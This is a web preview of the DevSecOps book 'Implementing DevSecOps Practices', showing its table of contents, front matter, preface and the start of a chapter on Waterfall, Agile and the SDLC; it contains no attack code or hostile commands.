Implementing DevSecOps Practices: Supercharge your software security with DevSecOps excellence 9781803231495

et to grips with application security, secure coding, and DevSecOps practices to implement in your development pipeline

341 112

English Pages 258 Year 2023

Report DMCA / Copyright

DOWNLOAD FILE

Polecaj historie

Implementing DevSecOps Practices: Supercharge your software security with DevSecOps excellence
 9781803231495

Table of contents :
Cover
Title Page
Copyright and Credits
Dedicated
Contributors
Table of Contents
Preface
Part 1:DevSecOps – What and How?
Chapter 1: Introducing DevSecOps
Product development processes
The Waterfall model
The Agile methodology
Understanding the shift from DevOps to DevSecOps
The new processes within DevSecOps
DevSecOps maturity levels
Maturity level 1
Maturity level 2
Maturity level 3
Maturity level 4
KPIs
DevSecOps – the people aspect
Summary
Think and act
Part 2: DevSecOps Principles and Processes
Chapter 2: DevSecOps Principles
DevSecOps principles
Unifying the CI/CD pipeline
Fail fast
Automation and innovation in DevSecOps
Introducing compliance checks
Empowering teams to make decisions
Cross-skilling and educating teams and the cultural aspect approach
Proper documentation
Relevant checkpoints
Building and managing secure Dev environments and toolchains
Challenges within the DevSecOps pipeline that principles can resolve
Continuous application changes
The developer knowledge gap
Lack of AppSec tool integration
Summary
Chapter 3: Understanding the Security Posture
Understanding your security posture
Regular meetings
Managing pipelines
Testing pipelines
Tools involved in pipelines
Why and what measures we take to secure the environment
Building the vulnerabilities inventory
Addressing vulnerabilities
Parameters to define the security posture
Discovering the third-party component
Measuring the effectiveness of the technologies used
Managing workflows
What measures can we take to monitor an environment?
A positive way toward the cloud-native world
Cloud-native architectures
Provisioning and configuring infrastructure
Automating controls
Securing the toolchains
Where does security stand in the whole development process?
Compliance and audit
Multi-cloud security
Monitoring
Incident response
Developer tools
Vulnerability management
Summary
Chapter 4: Understanding Observability
Why do we need observability?
The key functions of observability
Linking observability with monitoring
Exploring the monitoring process
Implementing observability with monitoring
Challenges around observability
Making organizations observable
Summary
Chapter 5: Understanding Chaos Engineering
Introducing chaos engineering
Why do we need chaos engineering?
Best practices while working with chaos engineering
Techniques involved in chaos engineering
Specific systems and services that organizations use for chaos engineering
Measuring the effectiveness of performing chaos engineering
Tools involved in chaos engineering
Basic principles of chaos engineering
Team communication strategies while performing chaos engineering experiments
Developing robust chaos engineering practice from failures
Challenges around chaos engineering
How chaos engineering is different from other testing measures
Summary
Part 3:Technology
Chapter 6: Continuous Integration and Continuous Deployment
What is a CI/CD pipeline?
CI
CD – continuous delivery and continuous deployment
The benefits of CI/CD
Automating the CI/CD pipeline
Source control
Automated builds
Continuous testing
Artifact storing
Deployment automation
Environment consistency
Monitoring and feedback
Rollbacks
The importance of a CI/CD pipeline
Summary
Chapter 7: Threat Modeling
What is threat modeling?
The importance of threat modeling in the software development lifecycle
Why should we perform threat modeling?
Threat modeling techniques
Integrating threat modeling into DevSecOps
Pre-development phase
Design phase
Development phase
Testing phase
Deployment phase
Open source threat modeling tools
How threat modeling tools help organizations
Reasons some organizations don’t use threat modeling
Summary
Chapter 8: Software Composition Analysis (SCA)
What is SCA?
How does SCA work?
SCA tools and their functionalities
The importance of SCA
The benefits of SCA
SAST versus SCA
The SCA process
SCA metrics
Integrating SCA with other security tools
Resolving the issues without breaking the build
Detection of security flaws
Open source SCA tools
Discussing past breaches
Summary
Chapter 9: Static Application Security Testing
Introduction
What is SAST?
SAST tools and their functionalities
Identifying vulnerabilities early in the development process
The SAST process
SAST metrics
Integrating SAST with other security tools
Resolving issues without breaking the build
The benefits of SAST
The limitations of SAST
Open source SAST tools
Case study 1
Case study 2
Loss due to not following the SAST process
Summary
Chapter 10: Infrastructure-as-Code (IaC) Scanning
What is IaC?
The importance of IaC scanning
IaC toolset functionalities
Advantages and disadvantages of IaC
Identifying vulnerabilities using IaC
What is the IaC process?
IaC metrics
IaC versus SAST
IaC security best practices
IaC in DevSecOps
Understanding DevSecOps
The role of IaC in DevSecOps
The DevSecOps process with IaC
Key benefits
Challenges and mitigation
Conclusion and future outlook
Open source IaC tools
Case study 1 – the Codecov security incident
Case study 2 – Capital One data breach
Case study 3 – Netflix environment improvement
Summary
Chapter 11: Dynamic Application Security Testing (DAST)
What is DAST?
Advantages and limitations of DAST
The DAST process
DAST usage for developers
DAST usage for security testers
The importance of DAST in secure development environments
Incorporating DAST into the application development life cycle
Advanced DAST techniques
Choosing the right DAST tool
How to perform a DAST scan in an organization
Integrating DAST with other security tools
Incorporating DAST into DevOps processes
Prioritizing and remediating vulnerabilities
Comparing DAST with other security testing approaches
SAST
IAST
RASP
The future of DAST
Summary
Part 4: Tools
Chapter 12: Setting Up a DevSecOps Program with Open Source Tools
Techniques used in setting up the program
Understanding DevSecOps
Setting up the CI/CD pipeline
The technicalities of setting up a CI/CD pipeline
Implementing security controls
Identifying open source security tools
Implementing security policies and procedures
Managing DevSecOps in production
Monitoring and managing the DevSecOps pipeline in production
Using open source tools for monitoring, logging, and alerting
Incorporating continuous compliance and auditing into the pipeline
Managing incidents and responding to security breaches
The benefits of the program
Summary
Part 5: Governance and an Effective Security Champions Program
Chapter 13: License Compliance, Code Coverage, and Baseline Policies
DevSecOps and its relevance to license compliance
The distinction between traditional licenses and security implications
Source code access
Modification and redistribution
Community oversight
Vendor dependency
Cost and resource allocation
Different types of software licenses
Permissive licenses (MIT, Apache)
Copyleft licenses (GPL, LGPL)
Proprietary licenses
The impact of software licenses on the DevSecOps pipeline
How to perform license reviews
Tools and techniques
Engaging legal and security teams
Documentation and continuous improvement
Fine-tuning policies associated with licenses
Establishing an organizational standard
Exception handling
Continuous review and improvement
Case studies
Case study 1 – the Redis licensing change
Case study 2 – Elastic versus AWS licensing drama
Summary
Chapter 14: Setting Up a Security Champions Program
The Security Champions program
Structuring your Security Champions program
Things to remember before setting up the program
Who should be a Security Champion?
How a Security Champions program would look
The top benefits of starting a Security Champions program
What does a Security Champion do?
Security Champions program – why do you need it?
Shared responsibility models
The roles of different teams
Buy-in from the executive
The importance of executive buy-in
How to secure executive buy-in
Measuring the effect of the Security Champions program
Technical aspects to check the effectiveness of the Security Champions program
Strategic aspects to check the effectiveness of the Security Champions program
Summary
Part 6: Case Studies and Conclusion
Chapter 15: Case Studies
Case study 1 – FinTech Corporation
Challenges faced before implementing DevSecOps
Steps were taken to transition to DevSecOps
Results and impact on the company’s software development
Lessons learned
Case study 2 – Verma Enterprises
Challenges faced by the organization in terms of security
Implementation of DevSecOps practices and tools
Results and benefits achieved
Case study 3 – HealthPlus
The importance of security in healthcare data and systems
The implementation of DevSecOps practices and tools to improve security
Results and benefits achieved
Case study 4 – GovAgency
Security requirements for government agencies
The implementation of DevSecOps practices and tools to meet compliance and improve security
Results and benefits achieved
Case study 5 – TechSoft
Security requirements for the IT sector
The implementation of DevSecOps practices and tools to meet compliance and improve security
Results and benefits achieved
Common lessons learned and best practices
Lessons learned from implementing DevSecOps practices and tools
Best practices for implementing DevSecOps in software development
Summary
Chapter 16: Conclusion
DevSecOps – what and how?
DevSecOps principles and processes
DevSecOps tools
DevSecOps techniques
Governance and an effective Security Champions program
Topics covered in this book
What’s next?
Case studies and conclusion
Index
Other Books You May Enjoy

Citation preview

Implementing DevSecOps Practices

Supercharge your software security with DevSecOps excellence

Vandana Verma Sehgal

BIRMINGHAM—MUMBAI

Implementing DevSecOps Practices Copyright © 2023 Packt Publishing All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews. Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the author, nor Packt Publishing or its dealers and distributors, will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book. Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information. Group Product Manager: Pavan Ramchandani Publishing Product Manager: Neha Sharma Book Project Manager: Ashwin Kharwa Senior Editor: Divya Vijayan Technical Editor: Irfa Ansari Copy Editor: Safis Editing Proofreader: Safis Editing Indexer: Hemangini Bari Production Designer: Gokul Raj S.T DevRel Marketing Coordinator: Marylou De Mello First published: December 2023 Production reference: 1231123 Published by Packt Publishing Ltd. Grosvenor House 11 St Paul’s Square Birmingham B3 1RB, UK ISBN 978-1-80323-149-5 www.packtpub.com

This book is dedicated to my mentors, who pushed me to write about my DevSecOps experiences, and the Packt team, who positively pushed me at every step. Vandana

Contributors About the author Vandana Verma Sehgal is a seasoned security professional with a current focus on DevSecOps at Snyk. In her previous experience, she has dealt with application security, vulnerability management, SOC, infrastructure security, and cloud security. She is a seasoned speaker/trainer and has presented at various public events, ranging from OWASP Global AppSec and Black Hat events to regional events, such as BSides events in India. She is part of the OWASP Global Board of Directors. She also works in various communities on the diversity initiatives Infosecgirls, WoSEC, and null. Vandana is a member of the Black Hat Asia Review Board as well as multiple other conferences, including Grace Hopper in India and OWASP AppSec in the USA. She is also one of the organizers of BSides Delhi. She has been the recipient of multiple prestigious awards, such as the Cyber Security Woman of the Year Award 2020 at the Cyber Security Awards, Application Security Influencer 2020 by Whitesource, Global Cybersecurity Influencer in IFSEC Global’s “Top Influencers in Security and Fire” category, and the Cybersecurity Woman of the Year Award by the Women’s Society of Cyberjutsu in the “Secure Coder” category. She has also been listed as one of the top women leaders in the field of technology and cybersecurity in India by InstaSafe.

About the reviewers Shaineel (Shain) Singh has over 25 years’ experience in the computing and telecommunication industries. He is the principal security architect for F5, working with businesses in various sectors throughout the Asia-Pacific region. Having held engineering and architecture roles in the systems, network, and security fields, Shain uses his cross-disciplinary skills to provide a lens into global security and industry trends. Shain likes to spend his time participating in humanitarian and technology-based community groups. He currently co-leads the OWASP Machine Learning Security Top 10 project and contributes to the DevSecOps and Zero Trust Cloud Security Alliance working groups, on their training and certification programs. The fields of technology and security in particular change rapidly. In order to keep up with the pace, I am deeply indebted to practitioners who take the time to educate, share, and contribute to open source communities, including OWASP, Cloud Security Alliance, and the Linux Foundation. Communities thrive because of the open and healthy collaborative nature in which they operate, and for this, I also thank the community outreach and project leaders.

Rewanth Tammana is a security ninja, open source contributor, AWS Community Builder, and an independent consultant. Previously, he was a senior security architect at the National Bank of Dubai. He is passionate about DevSecOps, the cloud, and container security, has contributed around 17,000+ lines of code to Nmap, and holds industry certifications such as CKS and CKA. Rewanth presents at security conferences worldwide, including Black Hat, DEF CON, Hack in the Box, CRESTCon, and Positive Hack Days. He was recognized as a Bugcrowd MVP Researcher (2018), having identified vulnerabilities in various organizations. He published an IEEE research paper on an offensive attack in machine learning and security and was part of the renowned Google Summer of Code. You can get in touch with him at rewanthtammana.com.

Table of Contents Prefacexv

Part 1: DevSecOps – What and How?

1 Introducing DevSecOps

3

Product development processes

4

The Waterfall model The Agile methodology

4 6

Understanding the shift from DevOps to DevSecOps 9 The new processes within DevSecOps 10 DevSecOps maturity levels 12 Maturity level 1

Maturity level 2 Maturity level 3 Maturity level 4

15 15 16

KPIs16 DevSecOps – the people aspect 17 Summary18 Think and act 18

14

Part 2: DevSecOps Principles and Processes

2 DevSecOps Principles

21

DevSecOps principles

22

Unifying the CI/CD pipeline Fail fast Automation and innovation in DevSecOps Introducing compliance checks Empowering teams to make decisions

22 23 23 24 25

Cross-skilling and educating teams and the cultural aspect approach Proper documentation Relevant checkpoints Building and managing secure Dev environments and toolchains

25 26 27 27

viii

Table of Contents

Challenges within the DevSecOps pipeline that principles can resolve

27

Continuous application changes

28

The developer knowledge gap Lack of AppSec tool integration

28 29

Summary29

3 Understanding the Security Posture Understanding your security posture 32 Regular meetings Managing pipelines Testing pipelines Tools involved in pipelines

32 33 33 33

Why and what measures we take to secure the environment

33

Building the vulnerabilities inventory Addressing vulnerabilities Parameters to define the security posture Discovering the third-party component Measuring the effectiveness of the technologies used Managing workflows

34 34 34 34 34 34

31 What measures can we take to monitor an environment?

35

A positive way toward the cloud-native world Cloud-native architectures Provisioning and configuring infrastructure Automating controls Securing the toolchains

35 35 36 36 36

Where does security stand in the whole development process?

37

Compliance and audit 37 Multi-cloud security 37 Monitoring38 Incident response 38 Developer tools 38 Vulnerability management 38

Summary39

4 Understanding Observability

41

Why do we need observability? 41 The key functions of observability 42 Linking observability with monitoring 44 Exploring the monitoring process Implementing observability with monitoring

44 45

Challenges around observability 46 Making organizations observable 47 Summary48

Table of Contents

5 Understanding Chaos Engineering Introducing chaos engineering

52

Why do we need chaos engineering? Best practices while working with chaos engineering

53 54

Techniques involved in chaos engineering

54

Specific systems and services that organizations use for chaos engineering

55

Measuring the effectiveness of performing chaos engineering

55

51 Tools involved in chaos engineering 56 Basic principles of chaos engineering 57 Team communication strategies while performing chaos engineering experiments Developing robust chaos engineering practice from failures Challenges around chaos engineering

57 58 59

How chaos engineering is different from other testing measures 59 Summary60

Part 3: Technology

6 Continuous Integration and Continuous Deployment What is a CI/CD pipeline?

64

CI64 CD – continuous delivery and continuous deployment 64

The benefits of CI/CD Automating the CI/CD pipeline

65 66

Source control Automated builds

67 68

63

Continuous testing 70 Artifact storing 72 Deployment automation 74 Environment consistency 76 Monitoring and feedback 78 Rollbacks79

The importance of a CI/CD pipeline 82 Summary84

7 Threat Modeling What is threat modeling? 85 The importance of threat modeling in the software development lifecycle 87

85 Why should we perform threat modeling? Threat modeling techniques

88 89

ix

x

Table of Contents

Integrating threat modeling into DevSecOps

91

Pre-development phase Design phase Development phase Testing phase Deployment phase

91 91 92 92 92

Open source threat modeling tools 93 How threat modeling tools help organizations 94 Reasons some organizations don’t use threat modeling 94 Summary95

8 Software Composition Analysis (SCA)

97

What is SCA?

97

106

How does SCA work? SCA tools and their functionalities

98 99

The importance of SCA The benefits of SCA SAST versus SCA The SCA process SCA metrics

100 101 102 103 105

Integrating SCA with other security tools Resolving the issues without breaking the build

108

Detection of security flaws 109 Open source SCA tools 110 Discussing past breaches 111 Summary113

9 Static Application Security Testing Introduction115 What is SAST? 116 SAST tools and their functionalities

116

Identifying vulnerabilities early in the development process

117

The SAST process SAST metrics Integrating SAST with other security tools

117 118 119

Resolving issues without breaking the build

120

115 The benefits of SAST 121 The limitations of SAST 121 Open source SAST tools 122 Case study 1 124 Case study 2 125 Loss due to not following the SAST process 125 Summary126

Table of Contents

10 Infrastructure-as-Code (IaC) Scanning What is IaC? The importance of IaC scanning IaC toolset functionalities Advantages and disadvantages of IaC Identifying vulnerabilities using IaC What is the IaC process? IaC metrics IaC versus SAST

IaC security best practices IaC in DevSecOps Understanding DevSecOps The role of IaC in DevSecOps

130 130 130 131 132 133 133 134

135 136 136 137

The DevSecOps process with IaC Key benefits Challenges and mitigation Conclusion and future outlook

129 137 138 138 138

Open source IaC tools 138 Case study 1 – the Codecov security incident 139 Case study 2 – Capital One data breach 140 Case study 3 – Netflix environment improvement140 Summary141

11 Dynamic Application Security Testing (DAST) What is DAST? Advantages and limitations of DAST The DAST process

DAST usage for developers DAST usage for security testers The importance of DAST in secure development environments Incorporating DAST into the application development life cycle Advanced DAST techniques Choosing the right DAST tool How to perform a DAST scan in an organization

143 144 145

146 147 148 149 150 151 152

Integrating DAST with other security tools Incorporating DAST into DevOps processes Prioritizing and remediating vulnerabilities

143 153 154 155

Comparing DAST with other security testing approaches 156 SAST156 IAST156 RASP157 The future of DAST 157

Summary158

xi

xii

Table of Contents

Part 4: Tools

12 Setting Up a DevSecOps Program with Open Source Tools Techniques used in setting up the program Understanding DevSecOps

Setting up the CI/CD pipeline The technicalities of setting up a CI/CD pipeline

162 162

164 165

Implementing security controls

166

Identifying open source security tools Implementing security policies and procedures

167 167

161

Managing DevSecOps in production 168 Monitoring and managing the DevSecOps pipeline in production Using open source tools for monitoring, logging, and alerting Incorporating continuous compliance and auditing into the pipeline Managing incidents and responding to security breaches

168 168 169 169

The benefits of the program 169 Summary171

Part 5: Governance and an Effective Security Champions Program

13 License Compliance, Code Coverage, and Baseline Policies DevSecOps and its relevance to license compliance The distinction between traditional licenses and security implications Source code access Modification and redistribution Community oversight Vendor dependency Cost and resource allocation

Different types of software licenses Permissive licenses (MIT, Apache) Copyleft licenses (GPL, LGPL)

176 177 178 178 178 178 179

179 179 180

Proprietary licenses

The impact of software licenses on the DevSecOps pipeline How to perform license reviews

175 181

181 182

Tools and techniques 182 Engaging legal and security teams 183 Documentation and continuous improvement 183

Fine-tuning policies associated with licenses183 Establishing an organizational standard Exception handling Continuous review and improvement

184 184 184

Table of Contents

Case studies Case study 1 – the Redis licensing change Case study 2 – Elastic versus AWS licensing

185

drama185

185

Summary185

14 Setting Up a Security Champions Program The Security Champions program Structuring your Security Champions program Things to remember before setting up the program

Who should be a Security Champion? How a Security Champions program would look

188 190 191

192 193

The top benefits of starting a Security Champions program 194 What does a Security Champion do? 195 Security Champions program – why do you need it? 196

187

Shared responsibility models The roles of different teams Buy-in from the executive

197 197 198

The importance of executive buy-in How to secure executive buy-in

198 198

Measuring the effect of the Security Champions program

199

Technical aspects to check the effectiveness of the Security Champions program 199 Strategic aspects to check the effectiveness of the Security Champions program 200

Summary201

Part 6: Case Studies and Conclusion

15 Case Studies

205

Case study 1 – FinTech Corporation 206

Case study 2 – Verma Enterprises

207

Challenges faced before implementing DevSecOps206 Steps were taken to transition to DevSecOps 206 Results and impact on the company’s software development 206 Lessons learned 207

Challenges faced by the organization in terms of security 207 Implementation of DevSecOps practices and tools 208 Results and benefits achieved 208

xiii

xiv

Table of Contents

Case study 3 – HealthPlus

208

Case study 5 – TechSoft

211

The importance of security in healthcare data and systems 209 The implementation of DevSecOps practices and tools to improve security 209 Results and benefits achieved 209

Security requirements for the IT sector The implementation of DevSecOps practices and tools to meet compliance and improve security Results and benefits achieved

Case study 4 – GovAgency

Common lessons learned and best practices212

210

Security requirements for government agencies210 The implementation of DevSecOps practices and tools to meet compliance and improve security 210 Results and benefits achieved 210

Lessons learned from implementing DevSecOps practices and tools Best practices for implementing DevSecOps in software development

211

211 212

212 213

Summary213

16 Conclusion215 DevSecOps – what and how? DevSecOps principles and processes DevSecOps tools DevSecOps techniques

215 216 216 216

Governance and an effective Security Champions program Topics covered in this book What’s next? Case studies and conclusion

216 217 218 219

Index221 Other Books You May Enjoy

234

Preface The integration of Development, Security, and Operations – commonly known as DevSecOps – has emerged as a pivotal approach to software delivery. This methodology not only emphasizes the importance of automating software delivery processes but also places paramount importance on integrating security practices, right from the initial stages of development. The essence of DevSecOps lies in its ability to break down traditional silos, fostering a culture of shared responsibility for both software quality and security. It recognizes that in the age of cyber threats and frequent software releases, security cannot be an afterthought; it must be ingrained at every stage of the software life cycle. This book is a culmination of insights, best practices, and hands-on techniques to implement DevSecOps in real-world environments. It delves deep into the practical aspects, guiding readers through the nuances of setting up robust CI/CD pipelines, integrating security tools, automating security checks, and fostering a culture that values security as much as speed. Whether you are an IT professional aiming to understand the intricacies of DevSecOps, a security enthusiast keen on integrating security into DevOps practices, or a seasoned practitioner looking for hands-on guidance, this book promises to be a comprehensive resource. Through its pages, we’ll demystify the challenges, celebrate the successes, and, above all, pave the way for a future where software is developed swiftly, securely, and efficiently. Join me on this enlightening journey as we delve into the world of DevSecOps, exploring its principles, practices, and profound impact on the realm of software delivery.

Who this book is for This book is crafted for a diverse range of readers who are either stepping into the world of DevSecOps or looking to deepen their understanding of its practical applications. Here’s a closer look at who would benefit the most from this resource: • Software developers and engineers: For professionals who design and code applications, this book offers insights into integrating security measures right from the inception of a project. Understand how to write secure code and identify potential vulnerabilities even before they become threats. • IT operations professionals: If you’re involved in deploying, monitoring, or managing applications, this guide will introduce you to the tools and practices that ensure smooth and secure deployments, emphasizing the importance of infrastructure as code and automated security checks.

xvi

Preface

• Security professionals: Those specializing in cybersecurity will benefit from the book’s emphasis on bridging the gap between security and other IT disciplines. Learn how to work collaboratively with development and operations teams, integrate security tools into CI/CD pipelines, and automate security protocols. • DevOps practitioners: If you’re already familiar with DevOps but wish to delve deeper into the security aspect, this book is for you. Understand how DevSecOps extends and refines the DevOps approach by embedding security in every stage of the software delivery life cycle. • Technical architects and consultants: Professionals responsible for designing IT ecosystems will gain insights into structuring systems that are both agile and secure, ensuring that security considerations are not just add-ons but foundational elements. • IT leaders and managers: For decision-makers aiming to implement a DevSecOps culture in their teams or organizations, this book offers a roadmap. Learn about the benefits, challenges, and strategies to promote a culture where security and agility go hand in hand. • Students and academics: Those in academia, either studying software development, IT management, or cybersecurity, will find this book a valuable addition to their curriculum, offering real-world insights and practical methodologies beyond theoretical knowledge. This book is a valuable resource for anyone keen on understanding the synergy between development, operations, and security and how to implement practices that ensure faster, more efficient, and most importantly, secure software delivery.

What this book covers Chapter 1, Introducing DevSecOps, discusses the basics of DevSecOps and the different maturity levels involved in the current state and future attainable state of the practices involved in DevSecOps. It helps organizations understand where they are and where things can be taken next. People are the most important element in any technology and process. You can use the best of technology and processes, but without people, goals can’t be achieved. In this chapter, we will learn about the involvement of different teams and what key performance indicators are. Chapter 2, DevSecOps Principles, explores the DevSecOps principles, which are the key concepts to pick up a program at any point of the development cycle and take it to the maturity stage. Chapter 3, Understanding the Security Posture, covers the understanding your security posture of DevSecOps pipeline within an organization. We will also be covering what measures are we taking to secure the environment and why, what measures can we take to monitor an environment?, and where does security stand in the whole development process? Chapter 4, Understanding Observability, examines what observability is and how it is different from monitoring. Also, we will look at how observability helps DevSecOps.

Preface

Chapter 5, Understanding Chaos Engineering, covers the ​​ aspects of chaos engineering and how data is fed to a system, well as understanding how the system fails. Chapter 6, Continuous Integration and Continuous Deployment, discusses what is CI/CD, the benefits of CI/CD, how we can automate the CI/CD pipeline, and the importance of the CI/CD pipeline. Chapter 7, Threat Modeling, dives into threat modeling, which involves examining applications through the eyes of an attacker in order to identify and highlight security flaws that could be exploited. This makes security a part of the organizational culture, laying the groundwork for a DevSecOps workplace. Threat modeling also helps teams better understand and learn each other’s roles, objectives, and pain points, resulting in a more collaborative and understanding organization. The chapter also covers the free and open source tools for threat modeling. Chapter 8, Software Composition Analysis (SCA), explores third-party dependencies, which are one of the biggest concerns when we deal with code. Some 80–90 percent of software code contains thirdparty dependencies or libraries. These dependencies come with their own issues and benefits. In this chapter, we will discuss software composition analysis and its uses. We also cover the free and open source tools for SCA. Chapter 9, Static Application Security Testing (SAST), examines SAST, which happens early in the Software Development Life Cycle (SDLC) because it does not require a working application and can be performed without executing any code. The chapter also covers the free and open source tools for SAST. Chapter 10, Infrastructure-as-Code (IaC) Scanning, discusses Infrastructure-as-Code (IaC) scanning, which looks for known vulnerabilities in your IaC configuration files. IaC improves usability and functionality while also assisting developers with infrastructure deployment. The chapter will share the aspects of IaC scanning and usability testing. The chapter also covers the free and open source tools for IaC. Chapter 11, Dynamic Application Security Testing (DAST), delves into DAST, which is the process of analyzing a web application from the frontend to find vulnerabilities. A DAST scanner looks for results that aren’t part of the expected result set and detects security flaws. The chapter also covers the free and open source tools for DAST. Chapter 12, Setting Up a DevSecOps Program with Open Source Tools, covers the tools and tips to set up an effective DevSecOps program, covering it from 360 degrees. Chapter 13, Licenses Compliance, Code Coverage, and Baseline Policies, explores license compliance, which ensures we manage licenses and policies and keep them up to date. Chapter 14, Setting Up a Security Champions Program, talks about who security champions are and how we can set up a security champions program.

xvii

xviii

Preface

Chapter 15, Case Studies, discusses case studies from organizations that have set up DevSecOps programs. What were the initial setbacks that eventually contributed to the DevSecOps program's success ? We look at the lessons learned along the way. Chapter 16, Conclusion, concludes the book, focusing on what we have learned from the different chapters and offering a call to action on the way forward.

To get the most out of this book Software/hardware covered in the book

Operating system requirements

Jenkins

Windows, macOS, or Linux

OWASP open source tools

Conventions used There are a number of text conventions used throughout this book. Bold: Indicates a new term, an important word, or words that you see on screen. For instance, words in menus or dialog boxes appear in bold. Here is an example: “Select System info from the Administration panel.” Tips or important notes Appear like this.

Get in touch Feedback from our readers is always welcome. General feedback: If you have questions about any aspect of this book, email us at customercare@ packtpub.com and mention the book title in the subject of your message. Errata: Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you have found a mistake in this book, we would be grateful if you would report this to us. Please visit www.packtpub.com/support/errata and fill in the form. Piracy: If you come across any illegal copies of our works in any form on the internet, we would be grateful if you would provide us with the location address or website name. Please contact us at [email protected] with a link to the material. If you are interested in becoming an author: If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, please visit authors.packtpub.com.

Preface

Share Your Thoughts Once you’ve read Implementing DevSecOps Practices, we’d love to hear your thoughts! Please click here to go straight to the Amazon review page for this book and share your feedback. Your review is important to us and the tech community and will help us make sure we’re delivering excellent quality content.

xix

xx

Preface

Download a free PDF copy of this book Thanks for purchasing this book! Do you like to read on the go but are unable to carry your print books everywhere? Is your eBook purchase not compatible with the device of your choice? Don’t worry, now with every Packt book you get a DRM-free PDF version of that book at no cost. Read anywhere, any place, on any device. Search, copy, and paste code from your favorite technical books directly into your application. The perks don’t stop there, you can get exclusive access to discounts, newsletters, and great free content in your inbox daily Follow these simple steps to get the benefits: 1. Scan the QR code or visit the link below

https://packt.link/free-ebook/978-1-80323-149-5 2. Submit your proof of purchase 3. That’s it! We’ll send your free PDF and other benefits to your email directly

Part 1: DevSecOps – What and How? This part will introduce you to DevSecOps, provide a bit of background information, and offer coverage of how different software development methods have played a role in its formation, from Waterfall to Agile. This chapter also looks at the various components of DevSecOps. We then focus on familiarizing you with DevSecOps basics and how an organization can set up DevSecOps. This part has the following chapter: • Chapter 1, Introducing DevSecOps

1 Introducing DevSecOps DevSecOps is a term that is getting a lot of attention from everywhere. Organizations used to perform product security checks at the end of the software development life cycle (SDLC) before the development of DevOps and DevSecOps. Security was viewed as less important than the other phases because the emphasis was primarily on application development. Most of the other stages would have been completed and the products would be nearly finished by the time engineers performed security checks. Therefore, finding a security threat at such a late stage required rewriting countless lines of code, a painfully time-consuming and laborious task. Patching eventually became the preferred solution, as expected. “As a result, it was assumed nothing could go wrong.” In this chapter, we will learn about the basics of DevSecOps and the different maturity levels involved in the current state and future attainable state of the practice involved in DevSecOps. We will also cover the following aspects: • The involvement of different teams • Key performance indicators (KPIs) We will also cover the evolution of DevOps and DevSecOps in terms of the Waterfall model, understand the agile methodology, and learn how DevSecOps is changing the paradigm for organizations. In the chapter, we are going to cover the following main topics: • Product development processes: ‚ Waterfall model ‚ Agile methodology • DevSecOps and its evolution • The new processes within DevSecOps

4

Introducing DevSecOps

• Maturity levels: ‚ Maturity level 1 ‚ Maturity level 2 ‚ Maturity level 3 ‚ Maturity level 4 • KPIs • DevSecOps – the people aspect

Product development processes Before we cover DevSecOps, let’s understand how products are developed. This is where we will run through the quick processes that are available currently or have existed in the past. Product development has been around for over six decades. Organizations, defense, and various teams have been following certain methodologies for developing and deploying applications. Let’s understand the evolution of these methodologies, which are as follows: • Spiral • Waterfall model • Agile software development: ‚ Extreme programming (XP) • Rapid application development (RAD) • Systems development life cycle All these methodologies have changed the way we develop applications. In the initial days, everything revolved around the Waterfall model, where every phase took time. Every phase has to be completed before we can move on to the next one. We will cover some of the important methodologies in this chapter as they lead to the agile process and DevSecOps. We will cover two models here – Waterfall and agile. First, we’ll discuss the Waterfall model.

The Waterfall model The SDLC is the process of developing applications in different phases. The SDLC has multiple models and the Waterfall model is one of the widely used models that is still in use by many organizations. The Waterfall model is there to help organizations with step-by-step processes.

Product development processes

The SDLC consists of seven stages: 1. Planning 2. Requirements gathering and analysis 3. Design 4. Development 5. Testing 6. Implementation and integration 7. Production and maintenance These are the sequential stages that are used in the Waterfall model, and they are used to develop an application: 1. Planning: This is the stage where organizations start to plan around what is needed in an application, the new features that need to be built, and what languages will be used. 2. Requirements gathering and analysis: During this stage, all potential system requirements are gathered and recorded in a requirement specification document. There are tools available to gather these requirements, though they can be captured in a Word document or Excel sheet as well. Which method is used depends on the organization. The best way to capture these requirements is in a system. If any of the requirements change, we can make the necessary changes in the system as well. 3. Design: Consider this stage as the architect’s dream session. We take all those must-haves and would-loves from phase 1 and turn them into an actionable blueprint. This sets the stage, specifying the hardware and painting the big picture of our digital masterpiece. It is like drafting the dream from a wishlist to a blueprint! 4. Development: This isn’t just coding; it’s crafting! We whip up mini-programs – our “magic blocks” – and piece them together like a puzzle. Each block goes through its own “quality check party” to make sure it’s up to snuff. Similar to building blocks, this is where small pieces create big magic! 5. Testing: Think of this stage as dress rehearsal meets detective work. Each of those mini-programs gets its moment in the spotlight before we assemble the full ensemble. Then, we put the whole act through the wringer, making sure it’s standing ovation-ready. Think of it as a test fest, where we iron out the kinks! 6. Implementation and integration: This stage is like the grand premiere, where our star finally takes the stage! This is where our product undergoes the royal testing treatment and is ready to make its big debut. Will it be the next blockbuster on the market or the VIP guest in a client’s world? Either way, it’s showtime!

5

6

Introducing DevSecOps

7. Production and maintenance: This stage has a different aspect – even rock stars need tune-ups. When real-world snags pop up, we roll out patches like a roadie rolls out amps. And because we’re always chasing perfection, get ready for some killer updates:

Figure 1.1: SDLC

The Waterfall model has helped change the way we develop applications smoothly and has been well adopted throughout organizations that went through the process step by step. There were a few releases every year. Adapting to that process was easy and more feasible. However, over the years, things started changing. Organizations wanted to develop applications faster. The cloud became a thing, and everyone wanted to push out their applications and features to production with lightning speed. This brought about the Agile and DevOps era to the system.

The Agile methodology The term agile software development refers to a fail-fast methodology and adopting new changes early on. Agile methods or Agile processes typically encourage a subdued management approach that pushes early inspection and adaptation. The Agile methodology is a framework for including all teams so that they can work together to deliver high-quality software quickly. The Agile methodology helps businesses tie development to customer needs and company objectives. In the early days, release cycles were long, and it took 3 months to a year to develop an application. Once that was done, everyone was relieved and ready to party. The Agile methodology changed the mindset, wherein there are more releases at a quicker pace. Organizations have started to release multiple applications in a month, in a week, or even in a day. The Agile methodology shortened the life cycle of developing an application to a great extent. Organizations started following scrum processes, which are part of Agile.

Scrum A process must adhere to a specific set of guidelines known as a “process framework” to be consistent with it. The scrum process highlights the importance of standing up every day for a very brief period and discussing sprints.

Product development processes

